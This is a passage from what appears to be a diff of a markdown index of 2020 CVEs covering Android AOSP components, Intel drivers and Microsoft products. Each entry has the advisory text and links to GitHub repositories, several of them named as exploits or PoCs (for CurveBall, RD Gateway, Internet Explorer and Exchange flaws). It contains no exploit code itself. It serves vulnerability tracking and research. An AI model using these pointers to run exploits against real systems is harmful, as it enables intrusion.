AndroidVersions: Android-10Android ID: A-120078455 + + +- [Satheesh575555/libhwbinder_AOSP10_r33_CVE-2020-0136](https://github.com/Satheesh575555/libhwbinder_AOSP10_r33_CVE-2020-0136) + +### CVE-2020-0137 (2020-06-11) + +In setIPv6AddrGenMode of NetworkManagementService.java, there is a possible bypass of networking permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-141920289 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0137](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0137) +- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137) + +### CVE-2020-0138 (2020-06-11) + +In get_element_attr_rsp of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution if bluetoothtbd were used, which it isn't in typical Android platforms, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-142878416 + + +- [Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138](https://github.com/Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138) + +### CVE-2020-0155 (2020-06-11) + +In phNxpNciHal_send_ese_hal_cmd of phNxpNciHal_ext.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-139736386 + + +- [Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155](https://github.com/Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155) + +### CVE-2020-0160 (2020-06-11) + +In setSyncSampleParams of SampleTable.cpp, there is possible resource exhaustion due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-124771364 + + +- [nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160) + +### CVE-2020-0181 (2020-06-11) + +In exif_data_load_data_thumbnail of exif-data.c, there is a possible denial of service due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145075076 + + +- [Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181](https://github.com/Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181) + +### CVE-2020-0183 (2020-06-11) + +In handleMessage of BluetoothManagerService, there is an incomplete reset. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-110181479 + + +- [nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183](https://github.com/nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183) +- [hshivhare67/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183](https://github.com/hshivhare67/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183) + +### CVE-2020-0188 (2020-06-11) + +In onCreatePermissionRequest of SettingsSliceProvider.java, there is a possible permissions bypass due to a PendingIntent error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-147355897 + + +- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188) +- [ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188](https://github.com/ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188) +- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219) + +### CVE-2020-0198 (2020-06-11) + +In exif_data_load_data_content of exif-data.c, there is a possible UBSAN abort due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-146428941 + + +- [Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198](https://github.com/Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198) + +### CVE-2020-0201 (2020-06-11) + +In showSecurityFields of WifiConfigController.java there is a possible credential leak due to a confused deputy. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-143601727 + + +- [uthrasri/Packages_app_settings_CVE-2020-0201](https://github.com/uthrasri/Packages_app_settings_CVE-2020-0201) +- [Trinadh465/packages_apps_Settings_CVE-2020-0201](https://github.com/Trinadh465/packages_apps_Settings_CVE-2020-0201) + +### CVE-2020-0203 (2020-06-11) + +In freeIsolatedUidLocked of ProcessList.java, there is a possible UID reuse due to improper cleanup. This could lead to local escalation of privilege between constrained processes with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-146313311 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203) + +### CVE-2020-0209 (2020-06-11) + +In multiple functions of AccountManager.java, there is a possible permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145206842 + + +- [pazhanivel07/frameworks_base_CVE-2020-0209](https://github.com/pazhanivel07/frameworks_base_CVE-2020-0209) + +### CVE-2020-0215 (2020-06-11) + +In onCreate of ConfirmConnectActivity.java, there is a possible leak of Bluetooth information due to a permissions bypass. This could lead to local escalation of privilege that exposes a pairing Bluetooth MAC address with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1 Android ID: A-140417248 + + +- [Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215](https://github.com/Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215) + +### CVE-2020-0218 (2020-06-11) + +In loadSoundModel and related functions of SoundTriggerHwService.cpp, there is possible out of bounds write due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-136005905 + + +- [pazhanivel07/frameworks_av-CVE-2020-0218](https://github.com/pazhanivel07/frameworks_av-CVE-2020-0218) + +### CVE-2020-0219 (2020-06-11) + +In onCreate of SliceDeepLinkSpringBoard.java there is a possible insecure Intent. This could lead to local elevation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-122836081 + + +- [pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219](https://github.com/pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219) +- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219) +- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old) +- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one) + +### CVE-2020-0225 (2020-07-17) + +In a2dp_vendor_ldac_decoder_decode_packet of a2dp_vendor_ldac_decoder.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-142546668 + + +- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0225](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0225) + +### CVE-2020-0226 (2020-07-17) + +In createWithSurfaceParent of Client.cpp, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege in the graphics server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-150226994 + + +- [Trinadh465/frameworks_native_CVE-2020-0226](https://github.com/Trinadh465/frameworks_native_CVE-2020-0226) +- [ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226](https://github.com/ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226) + +### CVE-2020-0227 (2020-07-17) + +In onCommand of CompanionDeviceManagerService.java, there is a possible permissions bypass due to a missing permission check. This could lead to local escalation of privilege allowing background data usage or launching from the background, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-129476618 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0227](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0227) + +### CVE-2020-0240 (2020-08-11) + +In NewFixedDoubleArray of factory.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-150706594 + + +- [ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240](https://github.com/ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240) + +### CVE-2020-0241 (2020-08-11) + +In NuPlayerStreamListener of NuPlayerStreamListener.cpp, there is possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-151456667 + + +- [nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241) + +### CVE-2020-0242 (2020-08-11) + +In reset of NuPlayerDriver.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the media server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-151643722 + + +- [pazhanivel07/frameworks_av-10-r33_CVE-2020-0242](https://github.com/pazhanivel07/frameworks_av-10-r33_CVE-2020-0242) +- [pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243](https://github.com/pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243) + +### CVE-2020-0245 (2020-09-17) + +In DecodeFrameCombinedMode of combined_decode.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-152496149 + + +- [Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245](https://github.com/Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245) + +### CVE-2020-0377 (2020-10-14) + +In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-158833854 + + +- [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377) + +### CVE-2020-0380 (2020-09-17) + +In allocExcessBits of bitalloc.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-146398979 + + +- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2020-0380](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2020-0380) + +### CVE-2020-0381 (2020-09-17) + +In Parse_wave of eas_mdls.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote information disclosure in a highly constrained process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-150159669 + + +- [Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381](https://github.com/Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381) + +### CVE-2020-0391 (2020-09-17) + +In applyPolicy of PackageManagerService.java, there is possible arbitrary command execution as System due to an unenforced protected-broadcast. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-158570769 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0391](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0391) + +### CVE-2020-0392 (2020-09-17) + +In getLayerDebugInfo of SurfaceFlinger.cpp, there is a possible code execution due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-150226608 + + +- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392) + +### CVE-2020-0394 (2020-09-17) + +In onCreate of BluetoothPairingDialog.java, there is a possible tapjacking vector due to an insecure default value. This could lead to local escalation of privilege and untrusted devices accessing contact lists with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-155648639 + + +- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0394](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0394) +- [pazhanivel07/Settings_10-r33_CVE-2020-0394](https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394) +- [pazhanivel07/Settings_10-r33_CVE-2020-0394_02](https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394_02) + +### CVE-2020-0401 (2020-09-17) + +In setInstallerPackageName of PackageManagerService.java, there is a missing permission check. This could lead to local escalation of privilege and granting spurious permissions with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-150857253 + + +- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0401](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0401) +- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0401](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0401) + +### CVE-2020-0409 (2020-11-10) + +In create of FileMap.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-8.0 Android-8.1 Android-9Android ID: A-156997193 + + +- [nanopathi/system_core_AOSP10_r33_CVE-2020-0409](https://github.com/nanopathi/system_core_AOSP10_r33_CVE-2020-0409) + +### CVE-2020-0413 (2020-10-14) + +In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-158778659 + + +- [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413) + +### CVE-2020-0416 (2020-10-14) + +In multiple settings screens, there are possible tapjacking attacks due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1Android ID: A-155288585 + + +- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0416](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0416) +- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0416](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0416) + +### CVE-2020-0418 (2020-11-10) + +In getPermissionInfosForGroup of Utils.java, there is a logic error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-153879813 + + +- [Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418](https://github.com/Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418) +- [fernandodruszcz/CVE-2020-0418](https://github.com/fernandodruszcz/CVE-2020-0418) + +### CVE-2020-0421 (2020-10-14) + +In appendFormatV of String8.cpp, there is a possible out of bounds write due to incorrect error handling. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-161894517 + + +- [nanopathi/system_core_AOSP10_r33_CVE-2020-0421](https://github.com/nanopathi/system_core_AOSP10_r33_CVE-2020-0421) + +### CVE-2020-0423 (2020-10-14) + +In binder_release_work of binder.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-161151868References: N/A + + +- [sparrow-labz/CVE-2020-0423](https://github.com/sparrow-labz/CVE-2020-0423) + +### CVE-2020-0439 (2020-11-10) + +In generatePackageInfo of PackageManagerService.java, there is a possible permissions bypass due to an incorrect permission check. This could lead to local escalation of privilege that allows instant apps access to permissions not allowed for instant apps, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-140256621 + + +- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439) + +### CVE-2020-0443 (2020-11-10) + +In LocaleList of LocaleList.java, there is a possible forced reboot due to an uncaught exception. This could lead to local denial of service requiring factory reset to restore with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-152410253 + + +- [Supersonic/CVE-2020-0443](https://github.com/Supersonic/CVE-2020-0443) + +### CVE-2020-0451 (2020-11-10) + +In sbrDecoder_AssignQmfChannels2SbrChannels of sbrdecoder.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9 Android-8.0 Android-8.1Android ID: A-158762825 + + +- [nanopathi/external_aac_AOSP10_r33_CVE-2020-0451](https://github.com/nanopathi/external_aac_AOSP10_r33_CVE-2020-0451) + +### CVE-2020-0452 (2020-11-10) + +In exif_entry_get_value of exif-entry.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution if a third party app used this library to process remote image data with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-159625731 + + +- [ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452](https://github.com/ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452) + +### CVE-2020-0453 (2020-11-10) + +In updateNotification of BeamTransferManager.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-8.0 Android-8.1Android ID: A-159060474 + + +- [pazhanivel07/Nfc_CVE-2020-0453](https://github.com/pazhanivel07/Nfc_CVE-2020-0453) +- [nanopathi/Packages_apps_Nfc_CVE-2020-0453](https://github.com/nanopathi/Packages_apps_Nfc_CVE-2020-0453) +- [Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453](https://github.com/Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453) + +### CVE-2020-0458 (2020-12-14) + +In SPDIFEncoder::writeBurstBufferBytes and related methods of SPDIFEncoder.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-8.0 Android-8.1Android ID: A-160265164 + + +- [nanopathi/system_media_AOSP10_r33_CVE-2020-0458](https://github.com/nanopathi/system_media_AOSP10_r33_CVE-2020-0458) + +### CVE-2020-0463 (2020-12-14) + +In sdp_server_handle_client_req of sdp_server.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure from the bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.0 Android-8.1 Android-9Android ID: A-169342531 + + +- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0463](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0463) + +### CVE-2020-0471 (2021-01-11) + +In reassemble_and_dispatch of packet_fragmenter.cc, there is a possible way to inject packets into an encrypted Bluetooth connection due to improper input validation. This could lead to remote escalation of privilege between two Bluetooth devices by a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-169327567. + + +- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0471](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0471) + +### CVE-2020-0551 (2020-03-12) + +Load value injection in some Intel(R) Processors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. The list of affected products is provided in intel-sa-00334: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00334.html + + +- [bitdefender/lvi-lfb-attack-poc](https://github.com/bitdefender/lvi-lfb-attack-poc) + +### CVE-2020-0557 (2020-04-15) + +Insecure inherited permissions in Intel(R) PROSet/Wireless WiFi products before version 21.70 on Windows 10 may allow an authenticated user to potentially enable escalation of privilege via local access. + + +- [hessandrew/CVE-2020-0557_INTEL-SA-00338](https://github.com/hessandrew/CVE-2020-0557_INTEL-SA-00338) + +### CVE-2020-0568 (2020-04-15) + +Race condition in the Intel(R) Driver and Support Assistant before version 20.1.5 may allow an authenticated user to potentially enable denial of service via local access. + + +- [hessandrew/CVE-2020-0568_INTEL-SA-00344](https://github.com/hessandrew/CVE-2020-0568_INTEL-SA-00344) + +### CVE-2020-0601 (2020-01-14) + +A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'. + + +- [nissan-sudo/CVE-2020-0601](https://github.com/nissan-sudo/CVE-2020-0601) +- [0xxon/cve-2020-0601](https://github.com/0xxon/cve-2020-0601) +- [SherlockSec/CVE-2020-0601](https://github.com/SherlockSec/CVE-2020-0601) +- [JPurrier/CVE-2020-0601](https://github.com/JPurrier/CVE-2020-0601) +- [0xxon/cve-2020-0601-plugin](https://github.com/0xxon/cve-2020-0601-plugin) +- [ly4k/CurveBall](https://github.com/ly4k/CurveBall) +- [kudelskisecurity/chainoffools](https://github.com/kudelskisecurity/chainoffools) +- [RrUZi/Awesome-CVE-2020-0601](https://github.com/RrUZi/Awesome-CVE-2020-0601) +- [BlueTeamSteve/CVE-2020-0601](https://github.com/BlueTeamSteve/CVE-2020-0601) +- [saleemrashid/badecparams](https://github.com/saleemrashid/badecparams) +- [0xxon/cve-2020-0601-utils](https://github.com/0xxon/cve-2020-0601-utils) +- [Doug-Moody/Windows10_Cumulative_Updates_PowerShell](https://github.com/Doug-Moody/Windows10_Cumulative_Updates_PowerShell) +- [MarkusZehnle/CVE-2020-0601](https://github.com/MarkusZehnle/CVE-2020-0601) +- [YoannDqr/CVE-2020-0601](https://github.com/YoannDqr/CVE-2020-0601) +- [thimelp/cve-2020-0601-Perl](https://github.com/thimelp/cve-2020-0601-Perl) +- [dlee35/curveball_lua](https://github.com/dlee35/curveball_lua) +- [IIICTECH/-CVE-2020-0601-ECC---EXPLOIT](https://github.com/IIICTECH/-CVE-2020-0601-ECC---EXPLOIT) +- [Ash112121/CVE-2020-0601](https://github.com/Ash112121/CVE-2020-0601) +- [gentilkiwi/curveball](https://github.com/gentilkiwi/curveball) +- [Hans-MartinHannibalLauridsen/CurveBall](https://github.com/Hans-MartinHannibalLauridsen/CurveBall) +- [apodlosky/PoC_CurveBall](https://github.com/apodlosky/PoC_CurveBall) +- [ioncodes/Curveball](https://github.com/ioncodes/Curveball) +- [amlweems/gringotts](https://github.com/amlweems/gringotts) +- [yanghaoi/CVE-2020-0601](https://github.com/yanghaoi/CVE-2020-0601) +- [talbeerysec/CurveBallDetection](https://github.com/talbeerysec/CurveBallDetection) +- [david4599/CurveballCertTool](https://github.com/david4599/CurveballCertTool) +- [eastmountyxz/CVE-2020-0601-EXP](https://github.com/eastmountyxz/CVE-2020-0601-EXP) +- [eastmountyxz/CVE-2018-20250-WinRAR](https://github.com/eastmountyxz/CVE-2018-20250-WinRAR) +- [gremwell/cve-2020-0601_poc](https://github.com/gremwell/cve-2020-0601_poc) +- [bsides-rijeka/meetup-2-curveball](https://github.com/bsides-rijeka/meetup-2-curveball) +- [exploitblizzard/CVE-2020-0601-spoofkey](https://github.com/exploitblizzard/CVE-2020-0601-spoofkey) +- [ShayNehmad/twoplustwo](https://github.com/ShayNehmad/twoplustwo) +- [okanulkr/CurveBall-CVE-2020-0601-PoC](https://github.com/okanulkr/CurveBall-CVE-2020-0601-PoC) +- [cimashiro/-Awesome-CVE-2020-0601-](https://github.com/cimashiro/-Awesome-CVE-2020-0601-) +- [tyj956413282/curveball-plus](https://github.com/tyj956413282/curveball-plus) +- [JoelBts/CVE-2020-0601_PoC](https://github.com/JoelBts/CVE-2020-0601_PoC) + +### CVE-2020-0609 (2020-01-14) + +A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0610. + + +- [ruppde/rdg_scanner_cve-2020-0609](https://github.com/ruppde/rdg_scanner_cve-2020-0609) +- [ly4k/BlueGate](https://github.com/ly4k/BlueGate) +- [MalwareTech/RDGScanner](https://github.com/MalwareTech/RDGScanner) +- [Archi73ct/CVE-2020-0609](https://github.com/Archi73ct/CVE-2020-0609) +- [ioncodes/BlueGate](https://github.com/ioncodes/BlueGate) + +### CVE-2020-0618 (2020-02-11) + +A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'. + + +- [euphrat1ca/CVE-2020-0618](https://github.com/euphrat1ca/CVE-2020-0618) +- [wortell/cve-2020-0618](https://github.com/wortell/cve-2020-0618) +- [itstarsec/CVE-2020-0618](https://github.com/itstarsec/CVE-2020-0618) + +### CVE-2020-0624 (2020-01-14) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0642. + + +- [james0x40/CVE-2020-0624](https://github.com/james0x40/CVE-2020-0624) + +### CVE-2020-0668 (2020-02-11) + +An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0669, CVE-2020-0670, CVE-2020-0671, CVE-2020-0672. + + +- [RedCursorSecurityConsulting/CVE-2020-0668](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668) +- [Nan3r/CVE-2020-0668](https://github.com/Nan3r/CVE-2020-0668) +- [modulexcite/SysTracingPoc](https://github.com/modulexcite/SysTracingPoc) +- [ycdxsb/CVE-2020-0668](https://github.com/ycdxsb/CVE-2020-0668) +- [bypazs/CVE-2020-0668.exe](https://github.com/bypazs/CVE-2020-0668.exe) +- [0xSs0rZ/Windows_Exploit](https://github.com/0xSs0rZ/Windows_Exploit) + +### CVE-2020-0674 (2020-02-11) + +A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0673, CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713, CVE-2020-0767. + + +- [maxpl0it/CVE-2020-0674-Exploit](https://github.com/maxpl0it/CVE-2020-0674-Exploit) +- [Ken-Abruzzi/CVE-2020-0674](https://github.com/Ken-Abruzzi/CVE-2020-0674) +- [Neko-chanQwQ/CVE-2020-0674-PoC](https://github.com/Neko-chanQwQ/CVE-2020-0674-PoC) +- [Micky-Thongam/Internet-Explorer-UAF](https://github.com/Micky-Thongam/Internet-Explorer-UAF) + +### CVE-2020-0683 (2020-02-11) + +An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links, aka 'Windows Installer Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0686. + + +- [padovah4ck/CVE-2020-0683](https://github.com/padovah4ck/CVE-2020-0683) + +### CVE-2020-0688 (2020-02-11) + +A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'. + + +- [random-robbie/cve-2020-0688](https://github.com/random-robbie/cve-2020-0688) +- [Jumbo-WJB/CVE-2020-0688](https://github.com/Jumbo-WJB/CVE-2020-0688) +- [Ridter/cve-2020-0688](https://github.com/Ridter/cve-2020-0688) +- [Yt1g3r/CVE-2020-0688_EXP](https://github.com/Yt1g3r/CVE-2020-0688_EXP) +- [righter83/CVE-2020-0688](https://github.com/righter83/CVE-2020-0688) +- [truongtn/cve-2020-0688](https://github.com/truongtn/cve-2020-0688) +- 